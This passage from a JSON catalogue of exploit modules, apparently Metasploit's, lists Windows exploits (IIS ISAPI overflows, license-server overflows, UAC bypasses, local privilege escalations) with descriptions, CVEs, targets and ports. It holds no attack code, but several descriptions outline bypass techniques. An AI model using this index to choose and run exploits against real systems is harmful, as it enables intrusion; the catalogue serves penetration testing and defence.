"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Brute Force",
"Windows 2000 -MS03-019",
"Windows 2000 +MS03-019",
"Windows XP -MS03-019"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb",
"is_install_path": true,
"ref_name": "windows/isapi/ms03_022_nsiislog_post",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/isapi/ms03_051_fp30reg_chunked": {
"name": "MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow",
"full_name": "exploit/windows/isapi/ms03_051_fp30reg_chunked",
"rank": 400,
"disclosure_date": "2003-11-11",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This is an exploit for the chunked encoding buffer overflow\n described in MS03-051 and originally reported by Brett\n Moore. This particular modules works against versions of\n Windows 2000 between SP0 and SP3. Service Pack 4 fixes the\n issue.",
"references": [
"CVE-2003-0822",
"OSVDB-2952",
"BID-9007",
"MSB-MS03-051"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 SP0-SP3",
"Windows 2000 07/22/02",
"Windows 2000 10/06/99"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb",
"is_install_path": true,
"ref_name": "windows/isapi/ms03_051_fp30reg_chunked",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/isapi/rsa_webagent_redirect": {
"name": "Microsoft IIS ISAPI RSA WebAgent Redirect Overflow",
"full_name": "exploit/windows/isapi/rsa_webagent_redirect",
"rank": 400,
"disclosure_date": "2005-10-21",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the SecurID Web\n Agent for IIS. This ISAPI filter runs in-process with\n inetinfo.exe, any attempt to exploit this flaw will result\n in the termination and potential restart of the IIS service.",
"references": [
"CVE-2005-4734",
"OSVDB-20151"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"RSA WebAgent 5.2",
"RSA WebAgent 5.3",
"RSA WebAgent 5.2 on Windows 2000 English",
"RSA WebAgent 5.3 on Windows 2000 English",
"RSA WebAgent 5.2 on Windows XP SP0-SP1 English",
"RSA WebAgent 5.3 on Windows XP SP0-SP1 English",
"RSA WebAgent 5.2 on Windows XP SP2 English",
"RSA WebAgent 5.3 on Windows XP SP2 English",
"RSA WebAgent 5.2 on Windows 2003 English SP0",
"RSA WebAgent 5.3 on Windows 2003 English SP0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/isapi/rsa_webagent_redirect.rb",
"is_install_path": true,
"ref_name": "windows/isapi/rsa_webagent_redirect",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/isapi/w3who_query": {
"name": "Microsoft IIS ISAPI w3who.dll Query String Overflow",
"full_name": "exploit/windows/isapi/w3who_query",
"rank": 400,
"disclosure_date": "2004-12-06",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the w3who.dll ISAPI\n application. This vulnerability was discovered Nicolas\n Gregoire and this code has been successfully tested against\n Windows 2000 and Windows XP (SP2). When exploiting Windows\n XP, the payload must call RevertToSelf before it will be\n able to spawn a command shell.",
"references": [
"CVE-2004-1134",
"OSVDB-12258",
"URL-http://www.exaprobe.com/labs/advisories/esa-2004-1206.html",
"BID-11820"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Detection",
"Windows 2000 RESKIT DLL [Windows 2000]",
"Windows 2000 RESKIT DLL [Windows XP]"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/isapi/w3who_query.rb",
"is_install_path": true,
"ref_name": "windows/isapi/w3who_query",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ldap/imail_thc": {
"name": "IMail LDAP Service Buffer Overflow",
"full_name": "exploit/windows/ldap/imail_thc",
"rank": 200,
"disclosure_date": "2004-02-17",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This exploits a buffer overflow in the LDAP service that is\n part of the IMail product. This module was tested against\n version 7.10 and 8.5, both running on Windows 2000.",
"references": [
"CVE-2004-0297",
"OSVDB-3984",
"BID-9682",
"URL-http://secunia.com/advisories/10880/"
],
"platform": "Windows",
"arch": "",
"rport": 389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 English",
"Windows 2000 IMail 8.x"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ldap/imail_thc.rb",
"is_install_path": true,
"ref_name": "windows/ldap/imail_thc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ldap/pgp_keyserver7": {
"name": "Network Associates PGP KeyServer 7 LDAP Buffer Overflow",
"full_name": "exploit/windows/ldap/pgp_keyserver7",
"rank": 400,
"disclosure_date": "2001-07-16",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in the LDAP service that is\n part of the NAI PGP Enterprise product suite. This module was tested\n against PGP KeyServer v7.0. Due to space restrictions, egghunter is\n used to find our payload - therefore you may wish to adjust WfsDelay.",
"references": [
"CVE-2001-1320",
"OSVDB-4742",
"BID-3046",
"URL-http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/"
],
"platform": "Windows",
"arch": "",
"rport": 389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal PGPcertd.exe"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/ldap/pgp_keyserver7.rb",
"is_install_path": true,
"ref_name": "windows/ldap/pgp_keyserver7",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/license/calicclnt_getconfig": {
"name": "Computer Associates License Client GETCONFIG Overflow",
"full_name": "exploit/windows/license/calicclnt_getconfig",
"rank": 200,
"disclosure_date": "2005-03-02",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a vulnerability in the CA License Client\n service. This exploit will only work if your IP address can be\n resolved from the target system point of view. This can be\n accomplished on a local network by running the 'nmbd' service\n that comes with Samba. If you are running this exploit from\n Windows and do not filter udp port 137, this should not be a\n problem (if the target is on the same network segment). Due to\n the bugginess of the software, you are only allowed one connection\n to the agent port before it starts ignoring you. If it wasn't for this\n issue, it would be possible to repeatedly exploit this bug.",
"references": [
"CVE-2005-0581",
"OSVDB-14389",
"BID-12705",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213"
],
"platform": "Windows",
"arch": "",
"rport": 10203,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 English",
"Windows XP English SP0-1",
"Windows XP English SP2",
"Windows 2003 English SP0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/license/calicclnt_getconfig.rb",
"is_install_path": true,
"ref_name": "windows/license/calicclnt_getconfig",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/license/calicserv_getconfig": {
"name": "Computer Associates License Server GETCONFIG Overflow",
"full_name": "exploit/windows/license/calicserv_getconfig",
"rank": 300,
"disclosure_date": "2005-03-02",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits an vulnerability in the CA License Server\n network service. By sending an excessively long GETCONFIG\n packet the stack may be overwritten.",
"references": [
"CVE-2005-0581",
"OSVDB-14389",
"BID-12705",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213"
],
"platform": "Windows",
"arch": "",
"rport": 10202,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 English",
"Windows XP English SP0-1",
"Windows XP English SP2",
"Windows 2003 English SP0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/license/calicserv_getconfig.rb",
"is_install_path": true,
"ref_name": "windows/license/calicserv_getconfig",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/license/flexnet_lmgrd_bof": {
"name": "FlexNet License Server Manager lmgrd Buffer Overflow",
"full_name": "exploit/windows/license/flexnet_lmgrd_bof",
"rank": 300,
"disclosure_date": "2012-03-23",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Alexander Gavrun",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in the FlexNet\n License Server Manager.\n\n The vulnerability is due to the insecure usage of memcpy\n in the lmgrd service when handling network packets, which\n results in a stack buffer overflow.\n\n In order to improve reliability, this module will make lots of\n connections to lmgrd during each attempt to maximize its success.",
"references": [
"OSVDB-81899",
"BID-52718",
"ZDI-12-052",
"URL-http://aluigi.altervista.org/adv/lmgrd_1-adv.txt",
"URL-http://www.flexerasoftware.com/pl/13057.htm"
],
"platform": "Windows",
"arch": "",
"rport": 27000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Debug",
"Autodesk Licensing Server Tools 11.5 / lmgrd 11.5.0.0 / Windows XP SP3",
"Alias License Tools 10.8.0.7 / lmgrd 10.8.0.7 / Windows XP SP3",
"Alias License Tools 10.8 / lmgrd 10.8.0.2 / Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/license/flexnet_lmgrd_bof.rb",
"is_install_path": true,
"ref_name": "windows/license/flexnet_lmgrd_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/license/sentinel_lm7_udp": {
"name": "SentinelLM UDP Buffer Overflow",
"full_name": "exploit/windows/license/sentinel_lm7_udp",
"rank": 200,
"disclosure_date": "2005-03-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a simple stack buffer overflow in the Sentinel\n License Manager. The SentinelLM service is installed with a\n wide selection of products and seems particular popular with\n academic products. If the wrong target value is selected,\n the service will crash and not restart.",
"references": [
"CVE-2005-0353",
"OSVDB-14605",
"BID-12742"
],
"platform": "Windows",
"arch": "",
"rport": 5093,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6",
"SentinelLM 7.2.0.0 Windows 2000 English",
"SentinelLM 7.2.0.0 Windows 2000 German",
"SentinelLM 7.2.0.0 Windows XP English SP0/SP1",
"SentinelLM 7.2.0.0 Windows 2003 English SP0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/license/sentinel_lm7_udp.rb",
"is_install_path": true,
"ref_name": "windows/license/sentinel_lm7_udp",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/adobe_sandbox_adobecollabsync": {
"name": "AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass",
"full_name": "exploit/windows/local/adobe_sandbox_adobecollabsync",
"rank": 500,
"disclosure_date": "2013-05-14",
"type": "exploit",
"author": [
"Felipe Andres Manzano",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability on Adobe Reader X Sandbox. The\n vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe\n process to write register values which can be used to trigger a buffer overflow on\n the AdobeCollabSync component, allowing to achieve Medium Integrity Level\n privileges from a Low Integrity AcroRd32.exe process. This module has been tested\n successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.",
"references": [
"CVE-2013-2730",
"OSVDB-93355",
"URL-http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader X 10.1.4 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb",
"is_install_path": true,
"ref_name": "windows/local/adobe_sandbox_adobecollabsync",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/agnitum_outpost_acs": {
"name": "Agnitum Outpost Internet Security Local Privilege Escalation",
"full_name": "exploit/windows/local/agnitum_outpost_acs",
"rank": 600,
"disclosure_date": "2013-08-02",
"type": "exploit",
"author": [
"Ahmad Moghimi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability on Agnitum Outpost Internet\n Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load\n arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary\n code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with\n Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).",
"references": [
"OSVDB-96208",
"EDB-27282"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Agnitum Outpost Internet Security 8.1"
],
"mod_time": "2018-06-14 15:15:29 +0000",
"path": "/modules/exploits/windows/local/agnitum_outpost_acs.rb",
"is_install_path": true,
"ref_name": "windows/local/agnitum_outpost_acs",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/alpc_taskscheduler": {
"name": "Microsoft Windows ALPC Task Scheduler Local Privilege Elevation",
"full_name": "exploit/windows/local/alpc_taskscheduler",
"rank": 300,
"disclosure_date": "2018-08-27",
"type": "exploit",
"author": [
"SandboxEscaper",
"bwatters-r7",
"asoto-r7",
"Jacob Robles"
],
"description": "On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented\n by the task scheduler service can be used to write arbitrary DACLs to `.job` files located\n in `c:\\windows\\tasks` because the scheduler does not use impersonation when checking this\n location. Since users can create files in the `c:\\windows\\tasks` folder, a hardlink can be\n created to a file the user has read access to. After creating a hardlink, the vulnerability\n can be triggered to set the DACL on the linked file.\n\n WARNING:\n The PrintConfig.dll (%windir%\\system32\\driverstor\\filerepository\\prnms003*) on the target host\n will be overwritten when the exploit runs.\n\n This module has been tested against Windows 10 Pro x64.",
"references": [
"CVE-2018-8440",
"URL-https://github.com/SandboxEscaper/randomrepo/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 10 x64"
],
"mod_time": "2018-09-26 21:13:37 +0000",
"path": "/modules/exploits/windows/local/alpc_taskscheduler.rb",
"is_install_path": true,
"ref_name": "windows/local/alpc_taskscheduler",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"os-resource-loss"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_windows/local/always_install_elevated": {
"name": "Windows AlwaysInstallElevated MSI",
"full_name": "exploit/windows/local/always_install_elevated",
"rank": 600,
"disclosure_date": "2010-03-18",
"type": "exploit",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Parvez Anwar"
],
"description": "This module checks the AlwaysInstallElevated registry keys which dictates if\n .MSI files should be installed with elevated privileges (NT AUTHORITY\\SYSTEM).\n The generated .MSI file has an embedded executable which is extracted and run\n by the installer. After execution the .MSI file intentionally fails installation\n (by calling some invalid VBS) to prevent it being registered on the system.\n By running this with the /quiet argument the error will not be seen by the user.",
"references": [
"URL-http://www.greyhathacker.net/?p=185",
"URL-http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx",
"URL-http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/always_install_elevated.rb",
"is_install_path": true,
"ref_name": "windows/local/always_install_elevated",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/applocker_bypass": {
"name": "AppLocker Execution Prevention Bypass",
"full_name": "exploit/windows/local/applocker_bypass",
"rank": 600,
"disclosure_date": "2015-08-03",
"type": "exploit",
"author": [
"Casey Smith",
"OJ Reeves"
],
"description": "This module will generate a .NET service executable on the target and utilize\n InstallUtil to run the payload bypassing the AppLocker protection.\n\n Currently only the InstallUtil method is provided, but future methods can be\n added easily.",
"references": [
"URL-https://gist.github.com/subTee/fac6af078937dda81e57"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2018-05-23 13:44:53 +0000",
"path": "/modules/exploits/windows/local/applocker_bypass.rb",
"is_install_path": true,
"ref_name": "windows/local/applocker_bypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/ask": {
"name": "Windows Escalate UAC Execute RunAs",
"full_name": "exploit/windows/local/ask",
"rank": 600,
"disclosure_date": "2012-01-03",
"type": "exploit",
"author": [
"mubix <mubix@hak5.org>",
"b00stfr3ak"
],
"description": "This module will attempt to elevate execution level using\n the ShellExecute undocumented RunAs flag to bypass low\n UAC settings.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/ask.rb",
"is_install_path": true,
"ref_name": "windows/local/ask",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bthpan": {
"name": "MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation",
"full_name": "exploit/windows/local/bthpan",
"rank": 200,
"disclosure_date": "2014-07-18",
"type": "exploit",
"author": [
"Matt Bergin <level@korelogic.com>",
"Jay Smith <jsmith@korelogic.com>"
],
"description": "A vulnerability within Microsoft Bluetooth Personal Area Networking module,\n BthPan.sys, can allow an attacker to inject memory controlled by the attacker\n into an arbitrary location. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile.",
"references": [
"MSB-MS14-062",
"CVE-2014-4971",
"URL-https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt",
"OSVDB-109387"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/bthpan.rb",
"is_install_path": true,
"ref_name": "windows/local/bthpan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac": {
"name": "Windows Escalate UAC Protection Bypass",
"full_name": "exploit/windows/local/bypassuac",
"rank": 600,
"disclosure_date": "2010-12-31",
"type": "exploit",
"author": [
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>",
"mitnick",
"mubix <mubix@hak5.org>"
],
"description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off.",
"references": [
"URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/bypassuac.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_comhijack": {
"name": "Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)",
"full_name": "exploit/windows/local/bypassuac_comhijack",
"rank": 600,
"disclosure_date": "1900-01-01",
"type": "exploit",
"author": [
"Matt Nelson",
"b33f",
"OJ Reeves"
],
"description": "This module will bypass Windows UAC by creating COM handler registry entries in the\n HKCU hive. When certain high integrity processes are loaded, these registry entries\n are referenced resulting in the process loading user-controlled DLLs. These DLLs\n contain the payloads that result in elevated sessions. Registry key modifications\n are cleaned up after payload invocation.\n\n This module requires the architecture of the payload to match the OS, but the\n current low-privilege Meterpreter session architecture can be different. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.\n\n This module invokes the target binary via cmd.exe on the target. Therefore if\n cmd.exe access is restricted, this module will not run correctly.",
"references": [
"URL-https://wikileaks.org/ciav7p1/cms/page_13763373.html",
"URL-https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-03 13:36:29 +0000",
"path": "/modules/exploits/windows/local/bypassuac_comhijack.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_comhijack",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_eventvwr": {
"name": "Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)",
"full_name": "exploit/windows/local/bypassuac_eventvwr",
"rank": 600,
"disclosure_date": "2016-08-15",
"type": "exploit",
"author": [
"Matt Nelson",
"Matt Graeber",
"OJ Reeves"
],
"description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows Event Viewer is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2018-10-31 16:31:52 +0000",
"path": "/modules/exploits/windows/local/bypassuac_eventvwr.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_eventvwr",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_fodhelper": {
"name": "Windows UAC Protection Bypass (Via FodHelper Registry Key)",
"full_name": "exploit/windows/local/bypassuac_fodhelper",
"rank": 600,
"disclosure_date": "2017-05-12",
"type": "exploit",
"author": [
"winscriptingblog",
"amaloteaux <alex_maloteaux@metasploit.com>"
],
"description": "This module will bypass Windows 10 UAC by hijacking a special key in the Registry under\n the current user hive, and inserting a custom command that will get invoked when\n the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC\n flag turned off.\n\n This module modifies a registry key, but cleans up the key once the payload has\n been invoked.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting your\n payload in a separate process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/bypassuac_fodhelper.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_fodhelper",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_injection": {
"name": "Windows Escalate UAC Protection Bypass (In Memory Injection)",
"full_name": "exploit/windows/local/bypassuac_injection",
"rank": 600,
"disclosure_date": "2010-12-31",
"type": "exploit",
"author": [
"David Kennedy \"ReL1K\" <kennedyd013@gmail.com>",
"mitnick",
"mubix <mubix@hak5.org>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Lesage",
"OJ Reeves"
],
"description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off. This module uses the Reflective DLL Injection\n technique to drop only the DLL payload binary instead of three separate\n binaries in the standard technique. However, it requires the correct\n architecture to be selected, (use x64 for SYSWOW64 systems also).\n If specifying EXE::Custom your DLL should call ExitProcess() after starting\n your payload in a separate process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/local/bypassuac_injection.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_injection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_injection_winsxs": {
"name": "Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS",
"full_name": "exploit/windows/local/bypassuac_injection_winsxs",
"rank": 600,
"disclosure_date": "2017-04-06",
"type": "exploit",
"author": [
"Ernesto Fernandez \"L3cr0f\" <ernesto.fernpro@gmail.com>"
],
"description": "This module will bypass Windows UAC by utilizing the trusted publisher\n certificate through process injection. It will spawn a second shell that\n has the UAC flag turned off by abusing the way \"WinSxS\" works in Windows\n systems. This module uses the Reflective DLL Injection technique to drop\n only the DLL payload binary instead of three seperate binaries in the\n standard technique. However, it requires the correct architecture to be\n selected, (use x64 for SYSWOW64 systems also).",
"references": [
"URL-https://github.com/L3cr0f/DccwBypassUAC"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2017-06-18 11:34:58 +0000",
"path": "/modules/exploits/windows/local/bypassuac_injection_winsxs.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_injection_winsxs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_sluihijack": {
"name": "Windows UAC Protection Bypass (Via Slui File Handler Hijack)",
"full_name": "exploit/windows/local/bypassuac_sluihijack",
"rank": 600,
"disclosure_date": "2018-01-15",
"type": "exploit",
"author": [
"bytecode-77",
"gushmazuko"
],
"description": "This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under\n the Current User hive, and inserting a custom command that will get invoked when any binary\n (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable\n to file handler hijacking. When we run slui.exe with changed Registry key\n (HKCU:\\Software\\Classes\\exefile\\shell\\open\\command), it will run our custom command as Admin\n instead of slui.exe.\n\n The module modifies the registry in order for this exploit to work. The modification is\n reverted once the exploitation attempt has finished.\n\n The module does not require the architecture of the payload to match the OS. If\n specifying EXE::Custom your DLL should call ExitProcess() after starting the\n payload in a different process.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86",
"Windows x64"
],
"mod_time": "2018-05-23 12:53:48 +0000",
"path": "/modules/exploits/windows/local/bypassuac_sluihijack.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_sluihijack",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/bypassuac_vbs": {
"name": "Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)",
"full_name": "exploit/windows/local/bypassuac_vbs",
"rank": 600,
"disclosure_date": "2015-08-22",
"type": "exploit",
"author": [
"Vozzie",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will bypass Windows UAC by utilizing the missing .manifest on the script host\n cscript/wscript.exe binaries.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/bypassuac_vbs.rb",
"is_install_path": true,
"ref_name": "windows/local/bypassuac_vbs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/capcom_sys_exec": {
"name": "Windows Capcom.sys Kernel Execution Exploit (x64 only)",
"full_name": "exploit/windows/local/capcom_sys_exec",
"rank": 300,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"TheWack0lian",
"OJ Reeves"
],
"description": "This module abuses the Capcom.sys kernel driver's function that allows for an\n arbitrary function to be executed in the kernel from user land. This function\n purposely disables SMEP prior to invoking a function given by the caller.\n This has been tested on Windows 7, 8.1 and Windows 10 (x64).",
"references": [
"URL-https://twitter.com/TheWack0lian/status/779397840762245124"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64 (<= 10)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/local/capcom_sys_exec.rb",
"is_install_path": true,
"ref_name": "windows/local/capcom_sys_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/local/current_user_psexec": {
"name": "PsExec via Current User Token",
"full_name": "exploit/windows/local/current_user_psexec",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>",
"jabra"
],
"description": "This module uploads an executable file to the victim system, creates\n a share containing that executable, creates a remote service on each\n target system using a UNC path to that file, and finally starts the\n service(s).\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.",
"references": [
"CVE-1999-0504",
